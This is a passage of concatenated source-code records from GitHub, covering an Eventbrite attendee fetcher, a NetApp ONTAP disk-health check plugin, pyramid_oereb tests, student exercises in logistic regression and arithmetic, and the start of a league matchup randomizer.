state == 'add_user':\n add_sftp_users(transfer_client, module)\n elif state == 
'remove_user':\n destroy_sftp_users(transfer_client, module)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"spam-n-eggs/ansible-aws-transfer","sub_path":"ansible_collections/tapp/amazon/plugins/modules/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":17434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17499610670","text":"import pylab as pl\nimport numpy as np\nfrom math import exp, log\n\n# Function to compute the estimated y (sigmoid)\ndef yEstimado(m, x, b):\n return 1 / (1+ exp(-(m * x + b)))\n\n# Binary cross-entropy function\ndef binaryCrossEntropy(m, X, b, Y):\n sum = 0\n for i in range(len(X)):\n sum += Y[i] * log(yEstimado(m, X[i], b)) + (1 - Y[i]) * log(1 - yEstimado(m, X[i], b))\n return sum * (-1)\n\n# Function to compute the derivative\n# with respect to the slope and the intercept\ndef gradient(y, x, m, b, opc):\n # slope\n if opc == 0:\n return (yEstimado(m, x, b) - y) * x\n # intercept\n elif opc == 1:\n return (yEstimado(m, x, b) - y)\n\n# Function to evaluate the test data\ndef test(testX, testY, m, b, umbral):\n c = 0\n cad = \"Test\" +'\\n'\n for i in range(len(testX)):\n if yEstimado(m, testX[i], b) >= umbral and testY[i] == 1:\n cad += \"Primer dato \"+str(testX[i])+\" = \"+str(yEstimado(m, testX[i], b))+\", aprobado estimado = \"+str(testY[i])+\", Correcto\" + '\\n'\n c+=1\n elif yEstimado(m, testX[i], b) < umbral and testY[i] == 0:\n cad += \"Primer dato \"+ str(testX[i])+\" = \"+str(yEstimado(m, testX[i], b))+\", aprobado estimado = \" +str(testY[i])+\", Correcto\" + '\\n'\n c+=1\n else:\n cad +=\"Primer dato \"+str(testX[i])+\" = \"+str(yEstimado(m, testX[i], b))+\", aprobado estimado = \"+str(testY[i])+\", Incorrecto\" + '\\n'\n cad += \"Porcentaje de Acierto: \"+ str((c * 100)/len(testX))+'%' + '\\n'\n return cad\n\n# Function to plot the data and the fitted curve\ndef plot(m, b, X, Y):\n pl.scatter(X,Y)\n x_real = np.arange(min(X)-1, max(X), 0.1)\n y_real = []\n for i in range(len(x_real)):\n y_real.append(yEstimado(m, x_real[i], b))\n pl.plot(x_real, y_real, color='yellowgreen')\n pl.show()\n\n# Function to display the arrays\ndef show(a):\n cad = \"x = {\"\n for i in range(len(a)):\n cad += str(a[i]) \n if i != len(a)-1: cad += \",\"\n cad += \"}\"\n return cad\n\n# Main logistic regression function\ndef logisticRegression(X, Y, testX, testY, trainX, trainY, m, b, iterations, tasa, umbral):\n cad = \"\"\n for i in range(iterations):\n dm = 0\n db = 0\n cad += \"Iteración \" + str(i+1) +'\\n'\n cad += \"Pendiente Anterior = \" + str(round(m,6)) +'\\n'\n cad += \"Intercepto Anterior = \" + str(round(b,6)) +'\\n'\n error = binaryCrossEntropy(m, trainX, b, trainY)\n cad += \"Error = \" + str(round(error,6)) +'\\n'\n cad += \"Tasa de aprendizaje = \"+ str(tasa) +'\\n'\n for j in range(len(trainX)): # j, not i: reusing i would clobber the outer iteration counter\n dm += gradient(trainY[j], trainX[j], m, b, 0)\n db += gradient(trainY[j], trainX[j], m, b, 1)\n cad += \"Derivada pendiente = \" + str(round(dm,6)) +'\\n'\n cad += \"Derivada intercepto = \" + str(round(db,6)) +'\\n'\n m = m - tasa * dm\n b = b - tasa * db\n cad += \"Pendiente nueva = \" + str(round(m,4)) +'\\n'\n cad += \"Intercepto nuevo = \" + str(round(b,4)) +'\\n'\n cad += '\\n'\n cad += test(testX, testY, m, b, umbral) +'\\n'\n plot(m, b, X, Y)\n return cad\n\nif __name__ == \"__main__\":\n X = [5, 7, 2, 13, 4, 15, 9, 4, 6, 1, 3, 10, 4, 10, 8, 20, 18, 15, 20, 12, 6, 12, 13, 14, 10, 6, 21, 25]\n Y = [0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1]\n umbral = 
0.5\n trainX = [5, 7, 2, 13, 4, 15, 9, 4, 6, 1, 3, 10, 4, 10, 8, 20, 18, 15, 20, 12, 6, 12]\n trainY = [0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1]\n testX = [13, 14, 10, 6, 21, 25]\n testY = [1, 1, 1, 0, 1, 1]\n # slope\n m = -0.9874\n # intercept\n b = -2.1789\n # learning rate\n tasa = 0.001\n # number of iterations\n iterations = 100000\n cad = \"Sharon Chullunquía Rosas\" + '\\n'\n cad += \"Pendiente anterior = \" + str(m) + '\\n'\n cad += \"Intercepto anterior = \" + str(b) + '\\n'\n cad += \"Tasa de aprendizaje = \" + str(tasa) + '\\n'\n cad += \"Cantidad de iteraciones = \" + str(iterations) + '\\n'\n cad += \"Umbral = \" + str(umbral) + '\\n'\n cad += \"Datos de Entrenamiento:\" + '\\n'\n cad += show(trainX) + '\\n'\n cad += show(trainY) + '\\n'\n cad += \"Datos de Test:\" + '\\n'\n cad += show(testX) + '\\n'\n cad += show(testY) + '\\n'\n cad += '\\n'\n\n cad += logisticRegression(X, Y, testX, testY, trainX, trainY, m, b, iterations, tasa, umbral)\n with open('regresion-logistica.txt', 'w') as fileName:\n fileName.write(cad)","repo_name":"sharon1160/IA","sub_path":"Laboratories/Laboratorio_05/regresion_logistica.py","file_name":"regresion_logistica.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14861148421","text":"\"\"\"Eventbrite API\n\nUsage:\nCurrent attendees are saved in 'attendees.db'\n\"\"\"\nimport cStringIO\nimport json\nimport pickle\nimport pycurl\n\nc = pycurl.Curl()\n\nPERSONAL_TOKEN = ''\nEVENTBRITE_EVENT_ID = ''\nassert PERSONAL_TOKEN != '', 'Please provide a PERSONAL_TOKEN'\nassert EVENTBRITE_EVENT_ID != '', 'Please provide a EVENTBRITE_EVENT_ID'\n\ndef get_current_attendees():\n try:\n attendees = pickle.load(open(\"attendees.db\", \"rb\"))\n except IOError:\n attendees = {'attendees':[]}\n pickle.dump(attendees, open(\"attendees.db\", \"wb\")) # write mode; a file opened with \"rb\" cannot be dumped to\n return attendees['attendees']\n\ndef set_current_attendees(attendee_list):\n attendee_dict = {'attendees': attendee_list}\n pickle.dump(attendee_dict, open(\"attendees.db\", \"wb\"))\n\ndef get_new_attendees():\n curr = get_current_attendees()\n all_attendees_info = get_eventbrite_attendees()\n all_attendees = [user['profile']['company'] for user in all_attendees_info]\n if not curr:\n return all_attendees\n if not all_attendees:\n return []\n return list(set(all_attendees) - set(curr))\n\ndef get_eventbrite_attendees():\n buf = cStringIO.StringIO()\n url = \"https://www.eventbriteapi.com/v3/events/{0}/attendees/?token={1}\".format(EVENTBRITE_EVENT_ID, PERSONAL_TOKEN)\n c.setopt(c.URL, url)\n c.setopt(c.WRITEFUNCTION, buf.write)\n c.perform()\n jsonBuf = json.loads(buf.getvalue())\n return jsonBuf['attendees']\n\ndef get_all_attendees():\n curr = get_current_attendees()\n new = get_new_attendees()\n if not curr:\n return new\n curr.extend(new)\n return curr\n\ndef get_and_set_new_attendees():\n new = get_new_attendees()\n set_current_attendees(get_all_attendees())\n return new\n\ndef main():\n pass\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JamshedVesuna/StartupFairTweeting","sub_path":"eventbrite.py","file_name":"eventbrite.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
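One gradient-descent step from the logistic-regression script above, written out on a single made-up training point; all numbers here are illustrative:

from math import exp

x, y = 10, 1                         # one training sample
m, b = -0.9874, -2.1789              # starting slope and intercept
rate = 0.001                         # learning rate

y_hat = 1 / (1 + exp(-(m * x + b)))  # sigmoid prediction, as in yEstimado
dm = (y_hat - y) * x                 # d(BCE)/dm for this sample
db = (y_hat - y)                     # d(BCE)/db for this sample
m, b = m - rate * dm, b - rate * db  # one descent update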
+{"seq_id":"33214682172","text":"#! python3\n# sendKeysSelenium.py - Opens a page and sends scrolling key presses to the <html> element\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\nbrowser = webdriver.Firefox()\nbrowser.get('http://nostarch.com')\n\nhtmlElem = browser.find_element_by_tag_name('html')\nhtmlElem.send_keys(Keys.END) # scroll to bottom\nhtmlElem.send_keys(Keys.HOME) # scroll to top (Keys.TOP does not exist in selenium)\n","repo_name":"aa-ahmed-aa/automate-boring-stuff","sub_path":"sendKeysSelenium.py","file_name":"sendKeysSelenium.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36018428777","text":"# Write a program that checks the requirements of a prospective programmer candidate\n# 1) Add a variable experience with the value 2, then languages with a list of elements:\n# \"python\", \"typescript\", \"javascript\", \"java\"\n# The last variable is contractType with the value \"b2b\" that the candidate wants\n# 2) Use an if statement with the and operator to check whether the\n# candidate has two or more years of experience and knows both python\n# and java. Remember to use the in operator to check whether\n# a value is in the list\n# 3) If the above conditions are met, add another if and check whether\n# the contract type is \"b2b\" or \"employment\"; remember to use the or operator.\n# Print a message in the terminal that the candidate is accepted when the conditions\n# are met.\n# 4) If the conditions in the if are not met, show an appropriate message\n# in the console after else\n\n\nexperience = 2\nlanguages = [\"python\", \"typescript\", \"javascript\", \"java\"]\ncontractType = \"b2b\"\n\nif experience >= 2 and \"python\" in languages and \"java\" in languages:\n if contractType == \"b2b\" or contractType == \"employment\":\n print(\"kandydat przyjęty\")\n else:\n print(\"kandydat nieprzyjęty\")\nelse:\n print(\"kandydat nie spełnia podstawowych warunków\")\n","repo_name":"rajchelm/python-academy","sub_path":"ud/Chalenges/candidate.py","file_name":"candidate.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14333677144","text":"import logging\nfrom monplugin import Check,Status\nfrom netapp_ontap.resources import Disk,Software\nfrom netapp_ontap.error import NetAppRestError\nfrom ..tools import cli\nfrom ..tools.helper import setup_connection,item_filter,severity,compareVersion\nimport re\n\n__cmd__ = \"disk-health\"\n\"\"\"\nDisk({\n 'rpm': 7200,\n 'node': {\n 'uuid': 'f3a35903-68ae-11e8-8898-4b3d2df62ccf',\n 'name': 'acme01',\n '_links': {'self': {'href': '/api/cluster/nodes/f3a35903-68ae-11e8-8898-4b3d2df62ccf'}}\n },\n 'shelf': {'uid': '4713285323093248592'},\n 'fips_certified': False,\n 'aggregates': [{\n 'uuid': 'fa49074c-5d93-4e5d-8d36-332226fcbe91',\n 'name': 'aggr0_acme01',\n '_links': {'self': {'href': '/api/storage/aggregates/fa49074c-5d93-4e5d-8d36-332226fcbe91'}}\n },\n {'uuid': '97e37d61-23b0-4917-85c8-ae9d5354bba5',\n 'name': 'aggr1_acme01',\n '_links': {'self': {'href': '/api/storage/aggregates/97e37d61-23b0-4917-85c8-ae9d5354bba5'}}\n }],\n 'vendor': 'NETAPP',\n 'firmware_version': 'NA00',\n 'usable_size': 3992785256448,\n 'self_encrypting': False,\n 'class': 'capacity',\n 'home_node': {\n 'uuid': 'f3a35903-68ae-11e8-8898-4b3d2df62ccf',\n 'name': 'acme01',\n '_links': {'self': {'href': '/api/cluster/nodes/f3a35903-68ae-11e8-8898-4b3d2df62ccf'}}\n },\n 'container_type': 'shared',\n 'name': '1.0.9',\n 'uid': 
'5000CCA2:6938888C:00000000:00000000:00000000:00000000:00000000:00000000:00000000:00000000',\n 'bay': 9,\n 'model': 'X336_HAKPE04TA07',\n 'serial_number': 'K7H02UUL',\n 'type': 'fsas',\n 'state': 'present',\n 'pool': 'pool0'})\n\"\"\"\n\ndef run():\n parser = cli.Parser()\n parser.add_optional_arguments(cli.Argument.EXCLUDE,\n cli.Argument.INCLUDE)\n parser.add_optional_arguments( {\n 'name_or_flags': ['--mode'],\n 'options': {\n 'action': 'store',\n 'choices': [\n 'multipath',\n 'diskhealth',\n ],\n 'default': 'diskhealth',\n 'help': 'which diskhealth mode to check',\n }\n })\n args = parser.get_args()\n # Setup module logging\n logger = logging.getLogger(__name__)\n logger.disabled = True\n if args.verbose:\n for log_name, log_obj in logging.Logger.manager.loggerDict.items():\n log_obj.disabled = False\n logging.getLogger(log_name).setLevel(severity(args.verbose))\n\n check = Check()\n\n setup_connection(args.host, args.api_user, args.api_pass)\n\n try:\n software = Software()\n software.get(fields='version')\n disk_count = Disk.count_collection()\n logger.debug(f\"Found {disk_count} disks\")\n if disk_count == 0:\n logger.debug(f\"found {disk_count} disks\")\n check.exit(Status.UNKNOWN, \"no disks found\")\n Disks = Disk.get_collection(fields=\"*\")\n except NetAppRestError as error:\n check.exit(Status.UNKNOWN, f\"ERROR => {error}\")\n\n if args.mode == \"multipath\":\n minimumVersion = \"9.9\"\n if compareVersion(minimumVersion,software[\"version\"]):\n check_multipath(check,logger,args,Disks)\n else:\n check.exit(Status.UNKNOWN,f\"at least ONTAP v{minimumVersion} is required. Currently v{software['version']} is installed\")\n elif args.mode == \"diskhealth\":\n check_diskstate(check,logger,args,Disks)\n else:\n check_diskstate(check,logger,args,Disks)\n\n (code,message) = check.check_messages(separator='\\n ')\n check.exit(code=code,message=message)\n\ndef check_multipath(check,logger,args,Disks):\n \"\"\"\n Minimum ONTAP v9.9 is required\n Disk({\n 'paths': [\n {'wwnn': '5000039a88191df8', 'port_name': 'B', 'initiator': '0d', 'port_type': 'sas', 'wwpn': '5000039a88191dfa'},\n {'wwnn': '5000039a88191df8', 'port_name': 'A', 'initiator': '0a', 'port_type': 'sas', 'wwpn': '5000039a88191df9'},\n {'wwnn': '5000039a88191df8', 'port_name': 'A', 'initiator': '0d', 'port_type': 'sas', 'wwpn': '5000039a88191df9'},\n {'wwnn': '5000039a88191df8', 'port_name': 'B', 'initiator': '0a', 'port_type': 'sas', 'wwpn': '5000039a88191dfa'}\n ],\n \"\"\"\n logger.info(\"starting multipath check\")\n count = 0\n for disk in Disks:\n if (args.exclude or args.include) and item_filter(args,disk.name):\n continue\n if not hasattr(disk,'paths'):\n logger.debug(f\"{disk}\")\n continue\n if len(disk.paths) % 2 != 0:\n check.add_message(Status.WARNING, f\"Disk {disk.name:7} on bay {disk.bay:2} of node {disk.node.name} has {len(disk.paths)} paths\")\n else:\n count += 1 # count only disks whose path count is even, so the OK summary below matches\n check.add_perfdata(label=f\"total\",value=int(count))\n if count == 1:\n check.add_message(Status.OK,f\"{count} disk has symmetric paths\")\n else:\n check.add_message(Status.OK,f\"{count} disks have symmetric paths\")\n\ndef check_diskstate(check,logger,args,Disks):\n out = {}\n cType = {}\n disk_count = Disk.count_collection()\n for disk in Disks:\n if (args.exclude or args.include) and item_filter(args,disk.name):\n disk_count -= 1\n continue\n logger.debug(f\"{disk}\")\n\n #Aggregate = Disk is used as a physical disk in an aggregate.\n #Broken = Disk is in broken pool.\n #Foreign = Array LUN has been marked foreign.\n #Labelmaint = Disk is in online 
label maintenance list.\n #Maintenance = Disk is in maintenance center.\n #Mediator = A mediator disk is a disk used on non-shared HA systems hosted by an external node which is used to communicate the viability of the storage failover between non-shared HA nodes.\n #Remote = Disk belongs to the remote cluster.\n #Shared = Disk is partitioned or in a storage pool.\n #Spare = Disk is a spare disk.\n #Unassigned = Disk ownership has not been assigned.\n #Unknown = Container is currently unknown. This is the default setting.\n #Unsupported = Disk is not supported.\n\n if not hasattr(disk, 'state'):\n setattr(disk, 'state', disk.container_type)\n\n stateWarn = re.match('reconstructing', disk.state)\n stateCrit = re.match('(broken|offline)', disk.state)\n\n if disk.container_type not in cType:\n cType[disk.container_type] = 0\n cType[disk.container_type] += 1\n\n out[disk.name] = {}\n out[disk.name]['name'] = disk.name\n out[disk.name]['state'] = disk.state\n out[disk.name]['bay'] = disk.bay\n out[disk.name]['node'] = disk.home_node.name if hasattr(disk, 'home_node') else \"unknown\"\n \n if disk.container_type in [\"unassigned\",\"unsupported\",\"unknown\"]:\n m = f\"Disk {disk.name:7} on bay {disk.bay:2} is {disk.container_type}\"\n check.add_message(Status.WARNING,m)\n elif disk.container_type != \"remote\":\n if disk.node.uuid != disk.home_node.uuid:\n check.add_message(Status.WARNING, f\"Disk {disk.name} is on node {disk.node.name} instead of {disk.home_node.name}\")\n m = f\"Disk {disk.name:7} on bay {disk.bay:2} of node {disk.home_node.name} is {disk.state}\"\n if stateWarn:\n check.add_message(Status.WARNING,m)\n elif stateCrit:\n check.add_message(Status.CRITICAL,m)\n\n for c in cType.keys():\n check.add_perfdata(label=c,value=int(cType[c]))\n check.add_perfdata(label=f\"total\",value=int(disk_count))\n check.add_message(Status.OK, f\"found {disk_count} disks in total while { ' - '.join({ f'{v} {k}' for (k,v) in cType.items()}) } \")\n for d in sorted(out.keys()):\n check.add_message(Status.OK, f\"Disk {out[d]['name']:7} on bay {out[d]['bay']:2} of node {out[d]['node']} is {out[d]['state']}\")\n\nif __name__ == \"__main__\":\n run()","repo_name":"ConSol-Monitoring/check_ontap","sub_path":"checkontap/ontapcmd/diskhealth.py","file_name":"diskhealth.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
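The state-to-severity mapping in check_diskstate above hinges on two regular expressions; a compact standalone illustration of the same matching, with made-up states:

import re

for state in ('present', 'reconstructing', 'broken', 'offline'):
    warn = re.match('reconstructing', state)
    crit = re.match('(broken|offline)', state)
    level = 'CRITICAL' if crit else 'WARNING' if warn else 'OK'
    print(f'{state:15} -> {level}')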
+{"seq_id":"2175215977","text":"#-------------------------------------------------------------------------------------\r\n#UFRJ - IM - DMA - TMAA-2019.1\r\n#-------------------------------------------------------------------------------------\r\n#March 14, 2019 - Exercise List 1 - Problem 2 - \"Múltiplos de X e Y\" (Multiples of X and Y)\r\n#-------------------------------------------------------------------------------------\r\n#Lucas Galdino de Souza (119039091)\r\n#-------------------------------------------------------------------------------------\r\n\r\nfrom math import gcd # needed for the least-common-multiple fix below\r\n\r\nprint('\\n\\t\\tMúltiplos de X e Y')\r\n\r\na1 = int(input('digite um valor: ')) # Value 1\r\nb1 = int(input('digite um valor: ')) # Value 2\r\nl = int(input('digite um valor maximo dos multiplos: ')) # Multiples below this value\r\n\r\nan = int(l // a1) # Number of multiples of the first value\r\nla =[]\r\n\r\nbn = int(l // b1) # Number of multiples of the other value\r\nlb = []\r\n\r\nlcm = (a1 * b1) // gcd(a1, b1) # common multiples are multiples of the LCM, not of the product a1*b1\r\nabn = int (l // lcm) # Number of multiples shared by both values\r\nlab = []\r\n\r\ni = 1\r\nj = 1\r\nk = 1\r\n\r\nif l % a1 == 0: # If the remainder is zero, subtract 1, since 'l' itself is not part of the list\r\n an = an - 1\r\n\r\nif l % b1 == 0:\r\n bn = bn - 1\r\n \r\nwhile len(la) < an : # Adding the multiples to the list (1st value)\r\n la.append(a1*i)\r\n i = i + 1\r\n \r\n \r\nprint('\\nOs múltiplos de {} abaixo de {} é ou são {}.'.format(a1, l, la), end = \" \")\r\n\r\nwhile len(lb) < bn : # Adding the multiples to the list (2nd value)\r\n lb.append(b1*j)\r\n j = j + 1\r\n\r\nprint('Os múltiplos de {} abaixo de {} é ou são {}'.format(b1, l, lb))\r\n\r\nwhile len(lab) < abn : # Adding the common multiples to the list\r\n lab.append(lcm*k)\r\n k = k + 1\r\n\r\ns1 = sum(la) # summing list 1\r\ns2 = sum(lb) # summing list 2\r\ns12 = sum(lab) # summing the list of common multiples\r\n\r\ns3 = 0\r\ns3 = s1 + s2 - s12 # Computing the sum of the multiples by inclusion-exclusion\r\n\r\nprint('Portando a soma dos múltiplos de {} e {} é {}.'.format(a1, b1, s3))\r\n\r\nsaida = input('')\r\n","repo_name":"LucasGaldino13/TMAA-2019.1","sub_path":"14 de março - lista 1 - problema 2.py","file_name":"14 de março - lista 1 - problema 2.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22692061180","text":"N = int(input())\ninfo = []\n\nfor _ in range(N):\n n, p = input().split()\n mp = p.replace('1', '@').replace('0', '%').replace('l', 'L').replace('O', 'o')\n if mp != p:\n info.append((n, mp))\n\n\nif not len(info) :\n if N == 1:\n print(\"There is 1 account and no account is modified\")\n else:\n print(f\"There are {N} accounts and no account is modified\")\nelse:\n print(len(info))\n for n, mp in info:\n print(n, mp)\n","repo_name":"xiaoyuzaijia/PAT_Advance_level","sub_path":"1035 Password.py","file_name":"1035 Password.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9715485084","text":"import io\nfrom pyramid_oereb.core.records.extract import ExtractRecord\nfrom pyramid_oereb.core.records.law_status import LawStatusRecord\nimport pytest\nimport datetime\n\nfrom shapely.wkt import loads\nfrom unittest.mock import patch\nfrom PIL import Image\n\nfrom pyramid.testing import DummyRequest\n\nfrom pyramid_oereb.core import b64\nfrom pyramid_oereb.core.adapter import FileAdapter\nfrom pyramid_oereb.core.records.image import ImageRecord\nfrom pyramid_oereb.core.records.theme import ThemeRecord\nfrom pyramid_oereb.core.records.view_service import LegendEntryRecord\nfrom pyramid_oereb.core.records.real_estate import RealEstateRecord\nfrom pyramid_oereb.core.hook_methods import compare, get_symbol, get_symbol_ref, \\\n get_logo_ref, get_qr_code_ref, get_surveying_data_update_date, \\\n plr_sort_within_themes\nfrom pyramid_oereb.contrib.data_sources.standard.sources.plr import StandardThemeConfigParser\nimport pyramid_oereb.contrib.data_sources.standard.hook_methods\nfrom tests.core.records.test_extract import create_dummy_extract\nfrom tests.core.records.test_plr import create_dummy_plr\n\ntry:\n from urllib.parse import urlparse\nexcept ImportError:\n from urlparse import urlparse\n\n\n@pytest.fixture\ndef legend_entry_data(pyramid_oereb_test_config, dbsession, transact, file_adapter):\n del transact\n theme_config = pyramid_oereb_test_config.get_theme_config_by_code('ch.BelasteteStandorte')\n config_parser = StandardThemeConfigParser(**theme_config)\n models = config_parser.get_models()\n\n view_services = {\n models.ViewService(**{\n 'id': 1,\n 'reference_wms': 'http://www.example.com',\n 
'layer_index': 1,\n 'layer_opacity': 1.0,\n })\n }\n dbsession.add_all(view_services)\n\n legend_entries = [\n models.LegendEntry(**{\n 'id': '1',\n 'symbol': b64.encode(file_adapter.read('tests/resources/symbol.png')),\n 'legend_text': {'de': 'Test'},\n 'type_code': 'CodeA',\n 'type_code_list': 'type_code_list',\n 'theme': 'ch.BelasteteStandorte',\n 'view_service_id': '1'\n })\n ]\n dbsession.add_all(legend_entries)\n dbsession.flush()\n\n yield legend_entries\n\n\n@pytest.fixture\ndef png_image():\n yield Image.new(\"RGB\", (72, 36), (128, 128, 128))\n\n\n@pytest.fixture\ndef png_binary(png_image):\n output = io.BytesIO()\n png_image.save(output, format='PNG')\n yield output.getvalue()\n\n\ndef test_get_symbol():\n with pytest.raises(NotImplementedError):\n binary_image, content_type = get_symbol({'identifier': \"1\"}, {})\n\n\n@patch.object(pyramid_oereb.core.hook_methods, 'route_prefix', 'oereb')\ndef test_get_symbol_ref(pyramid_test_config):\n record = LegendEntryRecord(\n ImageRecord(FileAdapter().read('tests/resources/logo_canton.png')),\n {'de': 'Test'},\n 'CodeA',\n 'http://my.codelist.com/test.xml',\n ThemeRecord('ch.BelasteteStandorte', {'de': 'Belastete Standorte'}, 410),\n view_service_id='1',\n identifier=\"1\"\n )\n request = DummyRequest()\n url = urlparse(get_symbol_ref(request, record))\n assert url.path == '/image/symbol/ch.BelasteteStandorte/legend_entry.png'\n\n\n@pytest.mark.parametrize('test_value, expected_results', [\n ({\n 'logo_code': 'ch',\n 'language': 'de',\n }, '/image/logo/ch/de.png'),\n ({\n 'logo_code': 'bs',\n 'language': 'fr',\n }, '/image/logo/bs/fr.png')\n ])\ndef test_get_logo_ref(test_value, expected_results, png_binary):\n request = DummyRequest()\n url = urlparse(get_logo_ref(request,\n test_value.get('logo_code'),\n test_value.get('language'),\n {test_value.get('language'): ImageRecord(png_binary)}\n ))\n assert url.path == expected_results\n\n\n@pytest.mark.parametrize('test_value, expected_results', [\n ('', ''),\n ({}, {}),\n (None, None)\n ])\ndef test_get_qr_code_ref(test_value, expected_results):\n request = DummyRequest()\n assert get_qr_code_ref(request, test_value) == expected_results\n\n\ndef test_get_surveying_data_date():\n real_estate = RealEstateRecord('test_type', 'BL', 'Nusshof', 1, 100,\n loads('POLYGON((0 0, 0 1, 1 1, 1 0, 0 0))'))\n update_date_os = get_surveying_data_update_date(real_estate)\n assert isinstance(update_date_os, datetime.datetime)\n\n\ndef test_plr_sort_within_themes():\n record = create_dummy_extract()\n sorted_extract = plr_sort_within_themes(record)\n assert isinstance(sorted_extract, ExtractRecord)\n\n\ndef test_compare():\n assert compare(create_dummy_plr(), create_dummy_plr()) == 0\n\n plr1 = create_dummy_plr()\n plr1.law_status = LawStatusRecord('AenderungMitVorwirkung', {})\n plr1.theme.code = 'ch.Nutzungsplanung'\n plr1.sub_theme = ''\n plr2 = create_dummy_plr()\n plr2.law_status = LawStatusRecord('inKraft', {})\n plr2.theme.code = 'ch.Nutzungsplanung'\n plr2.sub_theme = ''\n\n assert compare(plr1, plr2) == 1\n assert compare(plr2, plr1) == -1\n\n plr1.law_status = LawStatusRecord('inKraft', {})\n assert compare(plr1, plr2) == 0\n","repo_name":"openoereb/pyramid_oereb","sub_path":"tests/core/test_hook_methods.py","file_name":"test_hook_methods.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"70549071209","text":"import random\nimport json\n\n\nclass MatchupRandomizerHelper:\n\tdef 
__init__(self):\n\t\tself.__teams_dictionary__ = dict()\n\n\t\tfor tier in self.data_by_tiers_season_cycle[self.current_cycle]:\n\t\t\t# a dict comprehension gives each team its own inner dict;\n\t\t\t# dict.fromkeys would share one mutable dict across every key\n\t\t\tself.__teams_dictionary__[tier] = {\n\t\t\t\tteam: dict(\n\t\t\t\t\tplayed_in_tier=[],\n\t\t\t\t\tplayed=[],\n\t\t\t\t\tnot_played=[],\n\t\t\t\t)\n\t\t\t\tfor team in self.data_by_tiers_season_cycle[self.current_cycle][tier]\n\t\t\t}\n\t\t\t\n\t\t# creating seed from current season and cycle\n\t\tseason_seed = self.current_season*1e3\n\t\tcycle_seed = self.current_cycle*1e0\n\t\tseed = int(season_seed + cycle_seed)\n\n\t\t# seed random\n\t\trandom.seed(seed)\n\n\t\t# initialize\n\t\tself.__build_teams_dictionary__()\n\t\tself.__initialize_graphs__()\n\n\t\twith open(f'./_dash_league_season-{self.current_season}_cycle-{self.current_cycle}.json', 'w') as f:\n\t\t\tjson.dump(self.__teams_dictionary__, f)\n\n\n\tdef check_graph_solved(self, graph):\n\t\treturn all(len(graph.edges([team])) == self.n_matchups_per_team for team in self.teams)\n\n\n\tdef check_current_team(self, graph, team):\n\t\treturn len(graph.edges([team])) == self.n_matchups_per_team\n\t\n\n\tdef __get_matchups__(self, availability_graph, matchup_graph, i=0, j=0):\n\t\tif self.check_graph_solved(matchup_graph):\n\t\t\treturn True, availability_graph, matchup_graph\n\n\t\tif i >= self.n_teams:\n\t\t\treturn False, availability_graph, matchup_graph\n\n\t\tavailability_graph_copy = availability_graph.copy()\n\t\tmatchup_graph_copy = matchup_graph.copy()\n\n\t\tteam = self.teams[i]\n\n\t\tif self.check_current_team(matchup_graph_copy, team):\n\t\t\tfor t in self.teams:\n\t\t\t\tif availability_graph_copy.has_edge(t, team):\n\t\t\t\t\tavailability_graph_copy.remove_edge(t, team)\n\t\t\t\t\t\n\t\t\treturn self.__get_matchups__(availability_graph_copy, matchup_graph_copy, i+1, 0)\n\n\t\tvalid_edges = list(availability_graph.edges(team))\n\n\t\tif j >= len(valid_edges):\n\t\t\treturn False, availability_graph, matchup_graph\n\n\t\tother_team = valid_edges[j][1]\n\n\t\tavailability_graph_copy.remove_edge(team, other_team)\n\n\t\tmatchup_graph_copy.add_edge(team, other_team)\n\n\t\tif self.check_current_team(matchup_graph_copy, team):\n\t\t\tfor t in self.teams:\n\t\t\t\tif availability_graph_copy.has_edge(t, team):\n\t\t\t\t\tavailability_graph_copy.remove_edge(t, team)\n\n\t\t\treturn self.__get_matchups__(availability_graph_copy, matchup_graph_copy, i+1, 0)\n\t\t\n\t\tisValid, A, M = self.__get_matchups__(availability_graph_copy, matchup_graph_copy, i, j+1)\n\n\t\tif isValid:\n\t\t\treturn True, A, M\n\n\t\treturn self.__get_matchups__(availability_graph, matchup_graph, i, j+1)\n\t\n\n\tdef __initialize_graphs__(self):\n\t\tfor team in self.__teams_dictionary__['dasher']:\n\t\t\tself.availability_graph.add_node(team)\n\t\t\tself.matchup_graph.add_node(team)\n\n\t\tfor team in self.__teams_dictionary__['dasher']:\n\t\t\tconnections = []\n\t\t\tfor matchup in self.__teams_dictionary__['dasher'][team]['not_played']:\n\t\t\t\tconnections.append((team, matchup))\n\n\t\t\tself.availability_graph.add_edges_from(connections)\n\n\t\tteams = list(self.__teams_dictionary__['dasher'].keys())\n\t\tteams.sort(key=lambda team: len(self.__teams_dictionary__['dasher'][team]['not_played']))\n\t\n\n\tdef __build_teams_dictionary__(self):\n\t\t'''\n\t\tThis method builds a dictionary of teams by tier, which contains the matchups to be played in the current season. It will prevent matches that have been played in the current season from recurring. 
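The bookkeeping this docstring describes boils down to set algebra; a tiny worked example with made-up team names, using the same operations as the method body below:

teams = {'A', 'B', 'C', 'D'}             # teams in the current tier
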